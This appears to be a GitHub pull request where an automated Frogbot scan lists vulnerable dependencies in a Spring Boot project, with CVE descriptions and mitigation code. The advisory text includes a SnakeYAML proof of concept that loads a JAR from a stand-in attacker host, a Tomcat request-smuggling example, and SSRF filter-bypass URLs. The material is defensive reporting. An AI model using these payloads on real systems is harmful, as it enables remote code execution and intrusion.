Frogbot demo

[muldos]

No description provided.

[github-actions]

📦 Vulnerable Dependencies

✍️ Summary

SEVERITY	CONTEXTUAL ANALYSIS	DIRECT DEPENDENCIES	IMPACTED DEPENDENCY	FIXED VERSIONS	CVES
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	ch.qos.logback:logback-core 1.2.11	[1.2.13] [1.3.12] [1.4.12]	CVE-2023-6378
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	ch.qos.logback:logback-classic 1.2.11	[1.2.13] [1.3.12] [1.4.12]	CVE-2023-6378
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.25] [11.0.0-M21] [9.0.90]	CVE-2024-34750
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-web 5.3.20	[5.3.34] [6.0.19] [6.1.6]	CVE-2024-22262
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-web 5.3.20	[5.3.33] [6.0.18] [6.1.5]	CVE-2024-22259
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-web 5.3.20	[5.3.32] [6.0.17] [6.1.4]	CVE-2024-22243
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.16] [11.0.0-M11] [8.5.96] [9.0.83]	CVE-2023-46589
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.14] [11.0.0-M12] [8.5.94] [9.0.81]	CVE-2023-44487
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.2] [8.5.84] [9.0.69]	CVE-2022-45143
High	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.0.27] [10.1.1] [8.5.53] [9.0.68]	CVE-2022-42252
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-expression 5.3.20	[5.3.39]	CVE-2024-38808
Medium	Not Covered	org.springframework.boot:spring-boot-starter-test:2.5.14	com.jayway.jsonpath:json-path 2.5.0	[2.9.0]	CVE-2023-51074
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.14] [11.0.0-M12] [8.5.94] [9.0.81]	CVE-2023-42795
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.14] [11.0.0-M12] [8.5.94] [9.0.81]	CVE-2023-45648
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.13] [11.0.0-M11] [8.5.93] [9.0.80]	CVE-2023-41080
Medium	Not Covered	com.netflix.graphql.dgs:graphql-dgs-spring-boot-starter:5.4.3	org.jetbrains.kotlin:kotlin-stdlib 1.5.32	[1.6.0]	CVE-2022-24329
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.19] [11.0.0-M17] [8.5.99] [9.0.86]	CVE-2024-24549
Medium	Not Covered	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-websocket 9.0.63	[10.1.19] [11.0.0-M17] [8.5.99] [9.0.86]	CVE-2024-23672
Low	Not Covered	org.springframework.boot:spring-boot-starter-test:2.5.14	org.xmlunit:xmlunit-core 2.8.4	[2.10.0]	CVE-2024-31573
Critical	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[2.0]	CVE-2022-1471
Critical	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-web 5.3.20	[6.0.0]	CVE-2016-1000027
High	Not Applicable	org.springframework.boot:spring-boot-starter-test:2.5.14	net.minidev:json-smart 2.4.8	[2.4.9]	CVE-2023-1370
High	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework.boot:spring-boot-autoconfigure 2.5.14	[2.5.15] [2.6.15] [2.7.12] [3.0.7]	CVE-2023-20883
High	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.apache.tomcat.embed:tomcat-embed-core 9.0.63	[10.1.5] [11.0.0-M5] [8.5.88] [9.0.71]	CVE-2023-24998
High	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	com.fasterxml.jackson.core:jackson-databind 2.12.6.1	[2.12.7.1] [2.13.4.1] [2.14.0]	CVE-2022-42003
High	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	com.fasterxml.jackson.core:jackson-databind 2.12.6.1	[2.12.7.1] [2.13.4]	CVE-2022-42004
High	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.31]	CVE-2022-25857
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-expression 5.3.20	[5.2.23.RELEASE] [5.3.26] [6.0.7]	CVE-2023-20861
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	com.fasterxml.jackson.core:jackson-databind 2.12.6.1	-	CVE-2023-35116
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.springframework:spring-expression 5.3.20	[5.2.24.RELEASE] [5.3.27] [6.0.8]	CVE-2023-20863
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.32]	CVE-2022-41854
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.31]	CVE-2022-38749
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.31]	CVE-2022-38750
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.31]	CVE-2022-38751
Medium	Not Applicable	org.springframework.boot:spring-boot-starter-web:2.5.14	org.yaml:snakeyaml 1.28	[1.32]	CVE-2022-38752

🔬 Research Details

[ CVE-2023-6378 ] ch.qos.logback:logback-core 1.2.11

Description:
A serialization vulnerability in logback receiver component part of
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service
attack by sending poisoned data.

[ CVE-2023-6378 ] ch.qos.logback:logback-classic 1.2.11

Description:
A serialization vulnerability in logback receiver component part of
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service
attack by sending poisoned data.

[ CVE-2024-34750 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java EE platform). Tomcat acts as a Java HTTP web application server, although it is not a full JEE application server.
HTTP/2 is a binary protocol where the client and server exchange binary frames instead of text lines as in HTTP/1.x. HTTP/2 resolves numerous concerns found in HTTP/1.1 by organizing each HTTP message into a series of HTTP/2 frames. These frames include frame type, length, flags, stream identifier (ID), and payload.

During an HTTP/2 async request, no exception is reported when the client closes the connection before the server could fully read the request. Therefore, the connection will be left open, which could lead to denial of service.

The Apache HTTP Server must have the http2 module enabled for the vulnerability to be exploitable, which is not the default.

[ CVE-2024-22262 ] org.springframework:spring-web 5.3.20

Description:
The Spring Framework is a widely used Java-based application framework that provides infrastructure support for the development of enterprise-level Java applications.
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL may be vulnerable to open redirect or SSRF attacks, if the application using the URL relies on validation checks to sanitize the URL before its use.

UriComponentsBuilder is a utility class provided in the org.springframework.web.util package. It is used to construct URLs or URI components dynamically. This class is particularly useful when building URIs with dynamic parameters such as query parameters, path variables and fragments in web applications.

UriComponentsBuilder class in Spring uses several regex patterns to parse and validate a given URL. A flaw in several patterns might lead to a filter bypass, which subsequently can lead to an open redirect attack or SSRF attack, depending on the usage of the URL.
For example:

UriComponents uriComponents = UriComponentsBuilder.fromUriString("http://google.com\\path")
                .path("/api/resource")
                .queryParam("param1", "value1")
                .build();
        System.out.println("userinfo: " + uriComponents.getUserInfo());
        System.out.println("host: " + uriComponents.getHost());

In the vulnerable example above, the host that will be returned by uriComponents.getHost() is google.com\path, although the expected host should be google.com.

It is important to note that a host that ends with a backslash (e. .g. google.com\) will be interpreted differently on different applications. For example, Chrome will turn the backslash into a forward slash while other applications such as Curl will not be able to resolve the URL.
This means impact highly depends on the way the application will access the URL after it has been parsed by UriComponentsBuilder.

[ CVE-2024-22259 ] org.springframework:spring-web 5.3.20

Description:
The Spring Framework is a widely used Java-based application framework that provides infrastructure support for the development of enterprise-level Java applications.
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL may be vulnerable to open redirect or SSRF attacks, if the application using the URL relies on validation checks to sanitize the URL before its use.

UriComponentsBuilder is a utility class provided in the org.springframework.web.util package. It is used to construct URLs or URI components dynamically. This class is particularly useful when building URIs with dynamic parameters such as query parameters, path variables and fragments in web applications.

UriComponentsBuilder class in Spring uses several regex patterns to parse and validate a given URL. A flaw in two regex patterns might lead to a filter bypass, which subsequently can lead to an open redirect attack or SSRF attack, depending on the usage of the URL.
For example:

UriComponents uriComponents = UriComponentsBuilder.fromUriString("http://google.com[127.0.0.1")
                .path("/api/resource")
                .queryParam("param1", "value1")
                .fragment("section1")
                .build();
        System.out.println("userinfo: " + uriComponents.getUserInfo());
        System.out.println("host: " + uriComponents.getHost());

In the vulnerable example above, the host that will be returned by uriComponents.getHost() is google.com, although the host that will actually be used (ex. when surfing to the URL in a browser) is 127.0.0.1.

[ CVE-2024-22243 ] org.springframework:spring-web 5.3.20

Description:
The Spring Framework is a widely used Java-based application framework that provides infrastructure support for the development of enterprise-level Java applications.
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL may be vulnerable to open redirect or SSRF attacks if the URL is used after passing validation checks.

UriComponentsBuilder is a utility class provided in the org.springframework.web.util package. It is used to construct URLs or URI components dynamically. This class is particularly useful when building URIs with dynamic parameters such as query parameters, path variables and fragments in web applications.

UriComponentsBuilder class in Spring uses several regex patterns to parse and validate a given URL. A flaw in two regex patterns might lead to a filter bypass, which subsequently can lead to an open redirect attack or SSRF attack, depending on the usage of the URL.
For example:

UriComponents uriComponents = UriComponentsBuilder.fromUriString("http://google.com[@127.0.0.1")
                .path("/api/resource")
                .queryParam("param1", "value1")
                .fragment("section1")
                .build();
        System.out.println("userinfo: " + uriComponents.getUserInfo());
        System.out.println("host: " + uriComponents.getHost());

In the vulnerable example above, the host that will be returned by uriComponents.getHost() is google.com, although the host that will actually be used (ex. when surfing to the URL in a browser) is 127.0.0.1.

[ CVE-2023-46589 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java EE platform). Tomcat acts as a Java HTTP web application server, although it is not a full JEE application server.
HTTP trailer headers are headers that are specified AFTER the request or response body, for example -

POST /examples/test.jsp HTTP/1.1
Host: www.example.co.jp

This is the HTTP Request Body

TrailerHeader: Trailer header value

A specially crafted trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.

For example sending following request -

POST /examples/test.jsp HTTP/1.1
Host: www.example.co.jp
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Connection: KeepAlive

5
foo=b
2
ar
0
testtrailer: aaaaa...(large size)
a: GET /examples/?this_is_attack HTTP/1.1
Host: attack

would cause Tomcat to interpret the request as two separate requests, and return two separate responses.
The large "safe" request could be used to bypass filtering by a reverse proxy, while Tomcat (which sits behind the reverse proxy, in the target intranet) would digest the smaller "malicious" request (with Host: attack)

[ CVE-2023-44487 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
The HTTP (Hypertext Transfer Protocol) is a fundamental protocol of the World Wide Web, enabling the exchange of data between a client (typically a web browser) and a server. It defines the rules for requesting and transmitting web pages and other resources over the internet. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP.

HTTP/2 is a modern network protocol designed to improve the performance and efficiency of web communication. It replaces the older HTTP/1.1 protocol and introduces features like header compression and enhanced request cancellation mechanisms, which collectively enhance the speed and responsiveness of websites.

This request cancellation mechanism allows clients to terminate unnecessary or redundant requests without waiting for a server's response, reducing network congestion and further improving the overall responsiveness of web applications.

HTTP/2 resolves numerous concerns found in HTTP/1.1 by organizing each HTTP message into a series of HTTP/2 frames. These frames include type, length, flags, stream identifier (ID), and payload. The stream ID is essential in clearly associating specific bytes on the network with their corresponding messages, facilitating secure multiplexing and concurrent processing. These streams are bidirectional, enabling clients to transmit frames, and servers to respond with frames using the same ID.

As detailed in this technical analysis, there's a vulnerability in the way request cancellation is implemented. The flaw lies in the process of sending an excessive number of requests (specifically, HEADERS frames), each immediately followed by a request cancellation frame utilizing the RST_STREAM frame. This sequence rapidly leads to a substantial consumption of server-side resources. Consequently, this vulnerability amplifies the risk of Distributed Denial of Service (DDoS) attacks, making it easier to overwhelm and exhaust the server's available resources.

A lot of server applications are vulnerable to the Http/2 Rapid Reset attack.
However, note that HTTP/2 must be enabled, which is not the default configuration on most applications (excluding nghttp2 for example).
A non-exhaustive list of these vulnerable web applications:

- Tomcat
- Jetty
- NGINX on certain conditions
- nghttp2
- Netty

Remediation:

Deployment mitigations

A possible mitigation is to limit the maximum number of requests that can be made over a single keep-alive connection.

Deployment mitigations

For NGINX:

Disabling HTTP/2 in NGINX is not necessary. Simply ensure you have configured:

• keepalive_requests should be kept at the default setting of 1000 requests
• http2_max_concurrent_streams should be kept at the default setting of 128 streams
• limit_conn and limit_req should be set "with a reasonable setting balancing application performance and security"

Development mitigations

For Nghttp2:
Implement nghttp2_on_frame_recv_callback callback function, and check and count RST_STREAM frames. If an excessive number of RST_STREAM frames are received, then take action, such as dropping the connection silently, or calling nghttp2_submit_goaway and gracefully terminate the connection.

#include <nghttp2/nghttp2.h>

// Callback function for handling frame reception
int on_frame_recv_callback(nghttp2_session* session,
                           const nghttp2_frame* frame, void* user_data) {
    // Check if the received frame is an RST_STREAM frame
    if (frame->hd.type == NGHTTP2_RST_STREAM) {
        // Increment a counter for RST_STREAM frames
        int* rst_stream_counter = (int*)user_data;
        (*rst_stream_counter)++;
        
        // Define a threshold for excessive RST_STREAM frames
        int rst_stream_threshold = 10;  // Adjust this value as needed
        
        // If the threshold is exceeded, take action (e.g., close the connection)
        if (*rst_stream_counter > rst_stream_threshold) {
            // Here, you can choose to close the connection gracefully or drop it
            // For demonstration purposes, we'll just print a message
            printf("Excessive RST_STREAM frames received. Closing the connection.\n");
            // You can call nghttp2_submit_goaway() to send a GOAWAY frame if needed.
            // nghttp2_submit_goaway(session, NGHTTP2_FLAG_NONE, error_code, opaque_data);
            // Then, close the connection.
        }
    }
    
    // Continue processing other frames if needed
    return 0;
}

int main() {
    // Initialize nghttp2_session and set up the on_frame_recv_callback
    nghttp2_session* session;
    int rst_stream_counter = 0;
    
    // Initialize nghttp2_session, set up callbacks, etc.
    // ...

    // Set the user data to be passed to the callback
    nghttp2_session_user_data(session, &rst_stream_counter);
    
    // Register the on_frame_recv_callback
    nghttp2_session_callbacks* callbacks;
    nghttp2_session_callbacks_new(&callbacks);
    nghttp2_session_callbacks_set_on_frame_recv_callback(callbacks, on_frame_recv_callback);
    // Other callback registrations here...
    
    // Attach the callbacks to the session
    nghttp2_session_server_new(&session, callbacks, &rst_stream_counter);
    
    // Start processing HTTP/2 frames
    // ...

    // Cleanup and finish the program
    // ...

    return 0;
}

Development mitigations

For Golang:

The default stream concurrency limit in golang is 250 streams (requests) per HTTP/2 connection. This value may be adjusted in the golang.org/x/net/http2 package using the Server.MaxConcurrentStreams setting and the ConfigureServer function which are available in golang.org/x/net/http2.

import (
	"fmt"
	"golang.org/x/net/http2"
	"net/http"
)

func main() {
	// Create an HTTP/2 server instance
	http2Server := &http2.Server{}

	// Set the desired stream concurrency limit
	maxConcurrentStreams := 500 // Change this to your desired limit
	http2Server.MaxConcurrentStreams = uint32(maxConcurrentStreams)

	// Configure an HTTP server to use HTTP/2 with the adjusted settings
	server := &http.Server{
		Addr:    ":8080",
		Handler: http.HandlerFunc(handleRequest),
	}
	http2.ConfigureServer(server, http2Server)

	// Start the HTTP server
	err := server.ListenAndServeTLS("cert.pem", "key.pem")
	if err != nil {
		fmt.Println("Error:", err)
	}
}

Development mitigations

For netty:

import io.netty.handler.codec.http2.Http2FrameListener;
import io.netty.handler.codec.http2.Http2FrameStream;
import io.netty.handler.codec.http2.Http2ResetFrame;
import io.netty.handler.codec.http2.Http2HeadersFrame;

public class CustomHttp2FrameListener implements Http2FrameListener {
    private int rstFrameCount = 0;
    private int maxRstFrameCount = 10; // Adjust this to your desired limit
    private long resetTimeMillis = System.currentTimeMillis();
    private long resetTimeIntervalMillis = 60000; // 60 seconds

    @Override
    public int onDataRead(Http2FrameStream stream, byte[] data, int padding, boolean endOfStream) {
        // Handle data frames if needed
        return 0;
    }

    @Override
    public void onHeadersRead(Http2FrameStream stream, Http2HeadersFrame headersFrame) {
        // Handle headers frames if needed
    }

    @Override
    public void onHeadersRead(Http2FrameStream stream, Http2HeadersFrame headersFrame, boolean endOfStream) {
        // Handle headers frames if needed
    }

    @Override
    public void onRstStreamRead(Http2FrameStream stream, Http2ResetFrame resetFrame) {
        long currentTimeMillis = System.currentTimeMillis();
        
        // Check if the reset time interval has passed, and reset the count if needed
        if (currentTimeMillis - resetTimeMillis >= resetTimeIntervalMillis) {
            rstFrameCount = 0;
            resetTimeMillis = currentTimeMillis;
        }
        
        rstFrameCount++;
        
        // Check if the count exceeds the limit
        if (rstFrameCount > maxRstFrameCount) {
            // Take action, e.g., close the connection, log, or drop frames
            // You can use stream or resetFrame to get more context if needed.
            // To close the connection, you can use stream.connection().close();
        }
    }
}

[ CVE-2022-45143 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java EE platform). It's a Java HTTP web application server, although not a full JEE application server.

In order to display HTTP errors, such as "404 - Page Not Found" or "403 - Forbidden", Tomcat uses one of the error report valve classes. By default, it uses the ErrorReportValve class to display such errors, which returns a simple HTML page containing basic information the error. However, Tomcat can be configured to use the JsonErrorReportValve instead, which returns a JSON containing the same details as ErrorReportValve.

When using JsonErrorReportValve, user input cannot appear in the generated JSON, unless it has been forwarded there programmatically by the developer or if the user used invalid characters in the URL. Said user input will appear in the message field of the JSON. However, JsonErrorReportValve did not escape the information passed to the message field. This could result in the user's input manipulating the JSON returned or invalidating it. However, there is no impact unless the returned JSON is then processed or parsed by the server or proxy, in which case the impact is unspecified.

The fix for the vulnerability added escaping to all fields that are not constant in JsonErrorReportValve.

Example of an error JSON with user input before the fix, injecting a new malicious key:

{
    "type": "Status Report",
    "message": "", "malicious": "No Error",
    ...				
}

The same error JSON with user input after the fix:

{
    "type": "Status Report",
    "message": "\u0022, \u0022malicious\u0022: \u0022No Error",
    ...				
}

[ CVE-2022-42252 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java platform).

Jakarta EE, formerly known as the Java Platform, is a set of specifications that extends Java SE with specifications for enterprise features such as distributed computing and web services.

Apache Tomcat is a Java HTTP web application server, although not a full JEE application server.

In Tomcat's configuration, the attribute rejectIllegalHeader is responsible for whether requests containing illegal headers will be rejected or have their illegal headers removed, with the rest of the request being handled normally. An example of an illegal Content-Length header can be 12\u000734, which starts with 12, followed by the unicode character \u0007 (The BELL control character) and ends with 34. This header is illegal because of the usage of the control character.

When rejectIllegalHeader is set to false (which means illegal headers are ignored and removed instead of rejected), if the illegal header is Content-Length, the content of the request will be left unprocessed. Then, the server will treat these bytes as being the start of the next request in the sequence. Remote attackers can exploit this vulnerability and perform request smuggling.

In Apache Tomcat 8, rejectIllegalHeader is set to false by default. However, in later version it is set to true.
Note, in Apache Tomcat below version 10, rejectIllegalHeaderName is an alias to rejectIllegalHeader and should also be taken into consideration.

The fix for the vulnerability changes the behavior of rejectIllegalHeader, and makes it so requests with an invalid Content-Length header are always rejected, even if the attribute is set to false.

[ CVE-2024-38808 ] org.springframework:spring-expression 5.3.20

Description:
In Spring Framework versions 5.3.0 - 5.3.38 and older unsupported versions, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial of service (DoS) condition.

Specifically, an application is vulnerable when the following is true:

• The application evaluates user-supplied SpEL expressions.

[ CVE-2023-51074 ] com.jayway.jsonpath:json-path 2.5.0

Description:
json-path v2.8.0 was discovered to contain a stack overflow via the Criteria.parse() method.

[ CVE-2023-42795 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Incomplete Cleanup vulnerability in Apache Tomcat.When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could
cause Tomcat to skip some parts of the recycling process leading to
information leaking from the current request/response to the next.

Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.

[ CVE-2023-45648 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially
crafted, invalid trailer header could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.

Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.

[ CVE-2023-41080 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.

The vulnerability is limited to the ROOT (default) web application.

[ CVE-2022-24329 ] org.jetbrains.kotlin:kotlin-stdlib 1.5.32

Description:
In JetBrains Kotlin before 1.6.0, it was not possible to lock dependencies for Multiplatform Gradle Projects.

[ CVE-2024-24549 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java EE platform). Tomcat acts as a Java HTTP web application server, although it is not a full JEE application server.
HTTP/2 is a binary protocol where the client and server exchange binary frames instead of text lines as in HTTP/1.x. HTTP/2 resolves numerous concerns found in HTTP/1.1 by organizing each HTTP message into a series of HTTP/2 frames. These frames include frame type, length, flags, stream identifier (ID), and payload.

The HEADERS frame type allows sending HTTP headers of, both, request and response. The HEADERS frame contains many flags.
The CONTINUATION frame type is similar to the HEADER frame, but it has just one flag: END_HEADERS. When it is not set, the peer knows that more headers are coming in the following CONTINUATION frames.

This mechanism allows an attacker to send an HTTP/2 stream with CONTINUATION frames, without setting the END_HEADERS flag in any of the frames. This can cause denial-of-service when sending an excessive number of these crafted frames due to caching all frames in memory.

Apache Tomcat must enable HTTP/2 in its configuration for the vulnerability to be exploitable, which is not the default.

[ CVE-2024-23672 ] org.apache.tomcat.embed:tomcat-embed-websocket 9.0.63

Description:
Apache Tomcat is an open source implementation of multiple parts of the Jakarta EE platform (Which is the evolution of the Java EE platform). Tomcat acts as a Java HTTP web application server, although it is not a full JEE application server.
WebSockets provide a bidirectional communication channel over a single long-lived TCP connection. Unlike traditional HTTP connections, which are typically request-response based, WebSockets enable real-time communication between a client and a server. This allows for more interactive and dynamic web applications where data can be pushed from the server to the client and vice versa without the need for constant polling.

The suspend/resume feature in Apache Tomcat is designed to help servers and clients communicate better by limiting the amount of incoming messages.

A flaw in the WsSession (a Websocket session) suspend/resume feature in Tomcat has been found that allows an attacker to create a Websocket without closing it on the server. This may lead to excessive resource consumption and therefore denial of service.

The flaw is the lack of session timeout, which means that a Websocket Session could be left open for an unlimited amount of time. By creating enough WebSockets that will consume enough resources, attackers may crash the server.

Note: To exploit this CVE the server must use the suspend/resume feature. In all other cases, if the session remains idle the session will automatically close due to the idle-timeout property.

[ CVE-2024-31573 ] org.xmlunit:xmlunit-core 2.8.4

Description:
XMLUnit for Java has Insecure Defaults when Processing XSLT Stylesheets

Remediation:

Development mitigations

Users running XSLT transformations with untrusted stylesheets should explicitly use XMLUnit's APIs to pass in a pre-configured TraX TransformerFactory with extension functions disabled via features and attributes. The required setFactory or setTransformerFactory methods have been available since XMLUnit for Java 2.0.0.

To set security measures:

import org.xmlunit.transform.Transformation;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class App {
    public static void main(String[] args) {
        Transformation transformation = new Transformation();
        Source xml = new StreamSource("src\\resources\\1.xml");
        transformation.setSource(xml);
        Source xsl = new StreamSource("src\\resources\\1.xsl");
        transformation.setStylesheet(xsl);

        // Create a transformer factory and disable extension functions
        TransformerFactory transformerFactory = TransformerFactory.newInstance();

        transformerFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

        // Set the configured transformer factory in the transformation
        transformation.setFactory(transformerFactory);

        Result result = new StreamResult("output.xml");
        transformation.transformTo(result);
    }
}

[ CVE-2022-1471 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

It was discovered that a crafted YAML file containing a Java Constructor can lead to remote code execution due to deserialization.

SnakeYaml's Constructor class, which inherits from SafeConstructor, allows any class type to be deserialized. A ConstructorException is thrown, but only after the malicious
payload is deserialized.

To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method.
The attacker must deserialize a Java "gadget" class that's available in the application's classpath in order to achieve code execution via the deserialization. However - there are gadget classes that are available by default such as the built-in javax.script.ScriptEngineManager.

A remote code execution PoC example, using the Java built-in class javax.script.ScriptEngineManager:

String strYaml = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
                + "[[!!java.net.URL [\"http://attacker.com\"]]]]";;
Yaml yaml = new Yaml(new Constructor(Foo.class));
yaml.load(strYaml);

The PoC will run an arbitrary JAR file supplied from http://attacker.com. Note that even though Constructor receives a specific class type (Foo.class), any gadget class can be deserialized.

Note that the vulnerability will not apply to applications that use the (non-default) SafeConstructor

Remediation:

Development mitigations

Use the (non-default) SafeConstructor class to initialize the Yaml class -

LoaderOptions options = new LoaderOptions();
Yaml yaml = new Yaml(new SafeConstructor(options));
String strYaml = Files.readString(Path.of("input_file")); 
String parsed = yaml.load(strYaml);

Note that this class will only allow deserialization of basic types such as Integers, Strings, Maps etc.

[ CVE-2016-1000027 ] org.springframework:spring-web 5.3.20

Description:
Spring-based applications that export service beans as endpoints using classes that extend the RemoteInvocationSerializingExporter class are vulnerable to Java deserialization attacks which could lead to RCE (Remote Code Execution). As of 2016, this vulnerability is still not fixed, as the Pivotal team (the maintainers of the Spring framework) disputed it as a security vulnerability in Spring itself and decided not to issue a fix. Instead, they deprecated HttpInvokerServiceExporter and SimpleHttpInvokerServiceExporter, the potentially vulnerable exporter classes that extend RemoteInvocationSerializingExporter and warned application developers not to use them when exposed to untrusted user input (see "WARNING" in the documentation). Applications that do not use the above classes can safely ignore this vulnerability.

Remediation:

Deployment mitigations

Do not use Java serialization for external endpoints (Do not extend the RemoteInvocationSerializingExporter class)

[ CVE-2023-1370 ] net.minidev:json-smart 2.4.8

Description:
Json-smart is a performance focused, JSON processor lib. When reaching a [ or { character in the JSON input, the code parses an array or an object respectively. It was discovered that the code does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause a stack exhaustion (stack overflow) and crash the software.

[ CVE-2023-20883 ] org.springframework.boot:spring-boot-autoconfigure 2.5.14

Description:
Spring Boot is an open-source Java framework that simplifies the development of stand-alone, production-grade Spring-based applications by providing a pre-configured environment with a range of features and capabilities. It eliminates the need for manual configuration and enables developers to focus on writing business logic rather than setting up infrastructure.
An issue has been discovered in the way that Spring Boot serves a welcome page.
The welcome page is an automatically generated page that is served when accessing the web root / or index.html.
If an acceptable response cannot be produced (for example, an Accept header in the client's request is not present), the welcome page results in a 404 error.
This issue could lead to a denial-of-service when the application is used with a reverse proxy cache that caches these error responses. Specifically - after an attacker causes the 404 response to get cached, any other clients that access the welcome page (or web root) will also get a 404 response.

Note that the vulnerability only affects applications that meet all of the following requirements:

• Spring MVC auto-configuration is used in the application, using one of these class annotations: @EnableAutoConfiguration or @SpringBootApplication.

• The application utilizes Spring Boot's welcome page feature, which can be static or templated. This is enabled by default but can be disabled by excluding WelcomePageHandlerMapping from the Spring context, or by overwriting the root / with a custom handler (@GetMapping("/")).

• The application is set up behind a proxy that caches 404 responses.

Remediation:

Deployment mitigations

Configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application.

[ CVE-2023-24998 ] org.apache.tomcat.embed:tomcat-embed-core 9.0.63

Description:
Apache Commons FileUpload makes it easy to add robust, high-performance, file upload capability to your servlets and web applications.

If an HTTP request is submitted using the POST method, and with a content type of multipart/form-data, then FileUpload can parse that request, and make the results available in a manner easily used by the caller.

